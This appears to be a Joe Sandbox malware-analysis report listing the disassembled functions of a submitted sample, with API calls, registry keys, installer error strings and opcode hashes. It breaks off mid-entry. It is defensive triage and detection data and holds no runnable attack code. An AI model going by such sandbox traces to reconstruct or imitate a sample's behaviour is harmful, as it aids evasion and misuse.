                                                            • API ID: FreeString$Heap$AllocateProcess
                                                            • String ID: `<u$atomutil.cpp
                                                            • API String ID: 2724874077-4051019476
                                                            • Opcode ID: 337e29b80529944037bec7cedc5ff6ee58942895d8a5388c847954df8ce75fc4
                                                            • Instruction ID: cc79a5445ecee51adbd97a8456380453aa259f4e15404a25e0d1aa26c420aa36
                                                            • Opcode Fuzzy Hash: 337e29b80529944037bec7cedc5ff6ee58942895d8a5388c847954df8ce75fc4
                                                            • Instruction Fuzzy Hash: B551707190422AAFDB21DB68C855EEEBBB8FF84710F154198E905EB251D771ED00CBA1
                                                            Function 008B1217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008B123F
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008870E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008B1276
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 008B136E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$lstrlen
                                                            • String ID: BundleUpgradeCode$regutil.cpp
                                                            • API String ID: 3790715954-1648651458
                                                            • Opcode ID: d1a2e3630becbddd4db36499de097aaadd10150a3673550a9877e2ec1e2fd0db
                                                            • Instruction ID: 545500bf450f3caf17797063bbc7c85c0654283f26d5e4fa58339178bb5cb709
                                                            • Opcode Fuzzy Hash: d1a2e3630becbddd4db36499de097aaadd10150a3673550a9877e2ec1e2fd0db
                                                            • Instruction Fuzzy Hash: 4341B235A0011AEFDF21DF99C868AEEB7A9FF48710F954169E901EF705E634DD009BA0
                                                            Function 008B6357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B4925
                                                              • Part of subcall function 008B490D: GetLastError.KERNEL32(?,?,?,00888770,00000000,00000000,00000000,00000000,00000000), ref: 008B492F
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,008B5C09,?,?,?,?,?,?,?,00010000,?), ref: 008B63C0
                                                            • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,008B5C09,?,?,?,?), ref: 008B6412
                                                            • GetLastError.KERNEL32(?,008B5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008B6458
                                                            • GetLastError.KERNEL32(?,008B5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 008B647E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$Write$Pointer
                                                            • String ID: dlutil.cpp
                                                            • API String ID: 133221148-2067379296
                                                            • Opcode ID: 584885160ddae4a5b2c3f45c9b6617d15ccef6c33e33e30c0a559c5928e35281
                                                            • Instruction ID: 675723f7c3e4a21d79377b366e1163e7e11b013333a3a5a588730f87103b0335
                                                            • Opcode Fuzzy Hash: 584885160ddae4a5b2c3f45c9b6617d15ccef6c33e33e30c0a559c5928e35281
                                                            • Instruction Fuzzy Hash: 0141A27290061ABFDB218E94CD45BEE7BA8FF04720F154225FD04E62A0E779DD20DBA5
                                                            Function 00872428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,008AFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008AFFEF,008912CF,?,00000000), ref: 0087246E
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008AFFEF,008912CF,?,00000000,0000FDE9,?,008912CF), ref: 0087247A
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                            • String ID: strutil.cpp
                                                            • API String ID: 3662877508-3612885251
                                                            • Opcode ID: 59b507ecdc597f63ec512f15d421c4da3628008876b53e4f65f028f53a9ec78a
                                                            • Instruction ID: 40fc388cb3d718670be0022778c2ba72d40062ae6a91ef90d5702518ad0a9f1b
                                                            • Opcode Fuzzy Hash: 59b507ecdc597f63ec512f15d421c4da3628008876b53e4f65f028f53a9ec78a
                                                            • Instruction Fuzzy Hash: 6F31F63030061AEFE7109E698CC4A7637D9FB54368B10C329FE29DB2A8E771CC019765
                                                            Function 0089AD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0089ADB3
                                                            Strings
                                                            • Failed to extract payload: %ls from container: %ls, xrefs: 0089AE3E
                                                            • Failed to extract all payloads from container: %ls, xrefs: 0089ADF7
                                                            • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0089AE4A
                                                            • Failed to open container: %ls., xrefs: 0089AD85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                            • API String ID: 1825529933-3891707333
                                                            • Opcode ID: 138599948c2214354118448380370b4b6aa0c72bec1d5c1a3362b806073a2ea3
                                                            • Instruction ID: ab69d97f37d61cf613560ab552087938a715661768b4b993a96eb3e223c89b71
                                                            • Opcode Fuzzy Hash: 138599948c2214354118448380370b4b6aa0c72bec1d5c1a3362b806073a2ea3
                                                            • Instruction Fuzzy Hash: 7C31B032C00129ABCF22AAE88C45E9E7778FF04710F144215FA21E7691E735DA55DBE2
                                                            Function 008B7A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7AF4
                                                            • SysFreeString.OLEAUT32(?), ref: 008B7AFF
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7B0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeString$Heap$AllocateProcess
                                                            • String ID: `<u$atomutil.cpp
                                                            • API String ID: 2724874077-4051019476
                                                            • Opcode ID: ea1cef3d4225314a7d9bc9f0f7ee5324e14f83f4ebe19890c447e028389e9ad9
                                                            • Instruction ID: 265274c47a098a42eb5a6e134f6302cbeaa281937df3de4978e20bee0d8af59f
                                                            • Opcode Fuzzy Hash: ea1cef3d4225314a7d9bc9f0f7ee5324e14f83f4ebe19890c447e028389e9ad9
                                                            • Instruction Fuzzy Hash: 28315232D05639BBCB229A98CC45EDEBBA8FF44750F114165E904FB351D770EE009B91
                                                            Function 0087F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00880654,00000001,00000001,00000001,00880654,00000000), ref: 0087F07D
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00880654,00000001,00000001,00000001,00880654,00000000,00000001,00000000,?,00880654,00000001), ref: 0087F09A
                                                            Strings
                                                            • Failed to remove update registration key: %ls, xrefs: 0087F0C7
                                                            • Failed to format key for update registration., xrefs: 0087F033
                                                            • PackageVersion, xrefs: 0087F05E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCompareString
                                                            • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                            • API String ID: 446873843-3222553582
                                                            • Opcode ID: 65890f0b17b05a1fed32d7d11edc91982335942c00e0741df23fd962e3cdef1f
                                                            • Instruction ID: ff285f496087ff868308d5c57802f208a7301adf41f4897e331d4be27e5b63ff
                                                            • Opcode Fuzzy Hash: 65890f0b17b05a1fed32d7d11edc91982335942c00e0741df23fd962e3cdef1f
                                                            • Instruction Fuzzy Hash: 03218731D40529BBCB21AA69CC05FAFBF78FF05720F104265B914E2356D7319900DA91
                                                            Function 008B433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B4440: FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                              • Part of subcall function 008B4440: FindClose.KERNEL32(00000000), ref: 008B4487
                                                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 008B4430
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                              • Part of subcall function 008B1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 008B123F
                                                              • Part of subcall function 008B1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,008870E8,00000100,000000B0,00000088,00000410,000002C0), ref: 008B1276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseFindQueryValue$FileFirstOpen
                                                            • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                            • API String ID: 3397690329-3978359083
                                                            • Opcode ID: 569681beb226ac319da95f8dd76698961d55fdb381ab848a44cc94aaaa3e45fe
                                                            • Instruction ID: b21514856d1bafe7d6c10498be5cc1283eeffd54bfde27fedae86d682f4219fd
                                                            • Opcode Fuzzy Hash: 569681beb226ac319da95f8dd76698961d55fdb381ab848a44cc94aaaa3e45fe
                                                            • Instruction Fuzzy Hash: EE31AD31A01209AADF20AF95CC42AFEBBB5FB04750F54917AEA05E6352E3319E60CB55
                                                            Function 008B4019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CopyFileW.KERNEL32(00000000,00874DBC,00000000,?,?,00000000,?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?), ref: 008B4033
                                                            • GetLastError.KERNEL32(?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008B4041
                                                            • CopyFileW.KERNEL32(00000000,00874DBC,00000000,00874DBC,00000000,?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?,00000001), ref: 008B40AC
                                                            • GetLastError.KERNEL32(?,008B412D,00000000,00874DBC,00000000,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008B40B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CopyErrorFileLast
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 374144340-2967768451
                                                            • Opcode ID: efae1d97600ed8072d8855708b5cf2e18b0c0824b84aa06734b10d3e8ed3c006
                                                            • Instruction ID: 1a9a189535287e4e9551a83e3824970cde800a8c213ef9858a1c833f21648776
                                                            • Opcode Fuzzy Hash: efae1d97600ed8072d8855708b5cf2e18b0c0824b84aa06734b10d3e8ed3c006
                                                            • Instruction Fuzzy Hash: A0210736640B3697DB703A994C92BBB76A8FF14B60B151136FF04DB313E7A08C4292E1
                                                            Function 0087EF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087EF56
                                                              • Part of subcall function 008B4153: SetFileAttributesW.KERNEL32(0089923A,00000080,00000000,0089923A,000000FF,00000000,?,?,0089923A), ref: 008B4182
                                                              • Part of subcall function 008B4153: GetLastError.KERNEL32(?,?,0089923A), ref: 008B418C
                                                              • Part of subcall function 00873C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0087EFA1,00000001,00000000,00000095,00000001,00880663,00000095,00000000,swidtag,00000001), ref: 00873C88
                                                            Strings
                                                            • Failed to allocate regid file path., xrefs: 0087EFB5
                                                            • swidtag, xrefs: 0087EF65
                                                            • Failed to format tag folder path., xrefs: 0087EFC3
                                                            • Failed to allocate regid folder path., xrefs: 0087EFBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                            • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                            • API String ID: 1428973842-4170906717
                                                            • Opcode ID: e296baf916ebd3e69f81356b8cf71734a96eb322ed52abf3923b4c2de7363720
                                                            • Instruction ID: b43fae3fb5948e34e28da3b3ad6a1e0e15c22f76f9e947a0019c98c1b683842d
                                                            • Opcode Fuzzy Hash: e296baf916ebd3e69f81356b8cf71734a96eb322ed52abf3923b4c2de7363720
                                                            • Instruction Fuzzy Hash: A2216931D05518EBCB15EB9DC841B9DFBB5FF48310F10C0E5E418EA2A6DB31DA41AB91
                                                            Function 00898DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00898E3A
                                                            • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0087F7E0,00000001,00000100,000001B4,00000000), ref: 00898E88
                                                            Strings
                                                            • Failed to open uninstall registry key., xrefs: 00898DFD
                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00898DD7
                                                            • Failed to enumerate uninstall key for related bundles., xrefs: 00898E99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCompareOpenString
                                                            • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                            • API String ID: 2817536665-2531018330
                                                            • Opcode ID: 7b5975296db59e9010c9207f9935f642258d97ca591827c8ff6bec8945efab2c
                                                            • Instruction ID: cc0ea910bbe5b4c517b5af57cb20d3fbd28dc3bc963e4414e0d7ca9a901d9544
                                                            • Opcode Fuzzy Hash: 7b5975296db59e9010c9207f9935f642258d97ca591827c8ff6bec8945efab2c
                                                            • Instruction Fuzzy Hash: FA21A33294022AFEDF11BA94CC56FEEBB79FB01720F284264F410E6160DB755E90D690
                                                            Function 0089D259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089D2EE
                                                            • ReleaseMutex.KERNEL32(?), ref: 0089D31C
                                                            • SetEvent.KERNEL32(?), ref: 0089D325
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                            • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                            • API String ID: 944053411-3611226795
                                                            • Opcode ID: 0f607bc1f149c87dbb854073027353379b9cfd27c84e67ba7e4d659031a2e43c
                                                            • Instruction ID: 912c30e72c7f34605581e4f9cc991375e69a8eaa4c8dd68aa1d0fe3a0f87f7a7
                                                            • Opcode Fuzzy Hash: 0f607bc1f149c87dbb854073027353379b9cfd27c84e67ba7e4d659031a2e43c
                                                            • Instruction Fuzzy Hash: C521DEB0A0030ABFDB10AF68D844A99BBF5FF48324F148629F964E7351C3B1E9508B91
                                                            Function 008B5907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,00896B11,00000000,?), ref: 008B591D
                                                            • GetLastError.KERNEL32(?,?,00896B11,00000000,?,?,?,?,?,?,?,?,?,00896F28,?,?), ref: 008B592B
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00896B11,00000000,?), ref: 008B5965
                                                            • GetLastError.KERNEL32(?,?,00896B11,00000000,?,?,?,?,?,?,?,?,?,00896F28,?,?), ref: 008B596F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                            • String ID: svcutil.cpp
                                                            • API String ID: 355237494-1746323212
                                                            • Opcode ID: 767b8ad1bd04977bfcfc203cd5219fb48baafd05f143071d1d50643f57110ad3
                                                            • Instruction ID: b9dad0278207ee4595608511a72077e17f5ca4a69b32e6da5ea53699be2a1c1a
                                                            • Opcode Fuzzy Hash: 767b8ad1bd04977bfcfc203cd5219fb48baafd05f143071d1d50643f57110ad3
                                                            • Instruction Fuzzy Hash: C721CF36941A39E7E7216B95AC05BEBAE69FB44BB0B114111BD44EB300E660CE0096E2
                                                            Function 008B3245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B3258
                                                            • VariantInit.OLEAUT32(?), ref: 008B3264
                                                            • VariantClear.OLEAUT32(?), ref: 008B32D8
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B32E3
                                                              • Part of subcall function 008B3498: SysAllocString.OLEAUT32(?), ref: 008B34AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocVariant$ClearFreeInit
                                                            • String ID: `<u
                                                            • API String ID: 347726874-3367579956
                                                            • Opcode ID: f4009c7a2d5c13522e62ba2bfe9007127074f5103c21d2f46784719aef164f44
                                                            • Instruction ID: ed8065cbadf9fd734c25d53164e1c16ed0a9442717742580b3ff33ee9cd658bd
                                                            • Opcode Fuzzy Hash: f4009c7a2d5c13522e62ba2bfe9007127074f5103c21d2f46784719aef164f44
                                                            • Instruction Fuzzy Hash: FE214C35A01619AFDB14DFA4C858EEEBBB9FF48716F144258E801EB320D7319E05CB90
                                                            Function 00879839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
